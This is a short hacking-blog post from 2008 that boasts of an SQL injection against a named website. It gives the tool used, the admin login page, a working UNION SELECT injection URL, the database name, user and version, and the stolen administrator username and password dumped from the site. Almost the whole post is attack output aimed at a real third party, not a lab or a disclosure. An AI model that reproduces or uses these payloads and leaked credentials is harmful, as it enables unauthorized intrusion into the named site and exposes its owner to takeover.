viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, October 10, 2008

[SQLi] http://www.sdmmp.org/

11:38 PM Posted by viperfx07 No comments

Tool --> schemafuzz.py v5.0
Admin loc --> http://www.sdmmp.org/login.php
Admin usr:pwd --> admin:adminjuga
Dump:
[+] URL:http://www.sdmmp.org/detail_berita.php?id=26+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8,9,10--
[+] Evasion Used: "+" "--"
[+] 19:29:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sdmmpo01_sdmpdb
User: sdmmpo01_root@localhost
Version: 4.1.22-standard
[+] Dumping data from database "sdmmpo01_sdmpdb" Table "admin"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] admin:adminjuga:

[-] [19:30:06]
[-] Total URL Requests 3
[-] Done

0 comments:

Post a Comment